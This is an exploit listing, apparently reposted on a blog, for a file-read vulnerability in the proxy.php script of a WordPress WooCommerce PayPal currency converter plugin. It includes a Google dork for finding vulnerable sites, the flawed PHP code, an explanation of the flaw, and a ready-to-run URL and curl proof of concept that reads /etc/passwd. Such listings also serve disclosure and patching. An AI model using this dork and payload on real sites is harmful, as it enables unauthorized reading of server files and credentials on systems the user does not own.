Title: WordPress Paypal Currency Converter Basic For Woocommerce 1.3 File Read 2016
# Exploit Title: Paypal Currency Converter Basic For Woocommerce File Read
# Google Dork: inurl:"paypal-currency-converter-basic-for-woocommerce"
# Date: 10/06/2015
# Exploit Author: Kuroi'SH
# Software Link: https://wordpress.org/plugins/paypal-currency-converter-basic-for-woocommerce/
# Version: <=1.3
# Tested on: Linux
Description:
proxy.php's code:
<?php
$file = file_get_contents($_GET['requrl']);
$left=strpos($file,'<div id=currency_converter_result>');
$right=strlen($file)-strpos($file,'<input type=hidden name=meta');
$snip= substr($file,$left,$right);
echo $snip;
?>
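The file named by the user-supplied requrl parameter is read and printed out
(it is passed to file_get_contents(), not included, so it is not executed as
PHP). Any HTML file can therefore be loaded, and an attacker may be able to
read any local file that is not executed by the server. When neither marker
string is present in the file, both strpos() calls return false, so substr()
starts at offset 0 and the whole file is echoed.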
Example:
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd
POC:
curl --silent --url "http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd"
You are now reading the article WordPress Paypal Currency Converter Basic For Woocommerce 1.3 File Read 2016 at the link address https://indonesia-darknet.blogspot.com/2016/10/wordpress-paypal-currency-converter.html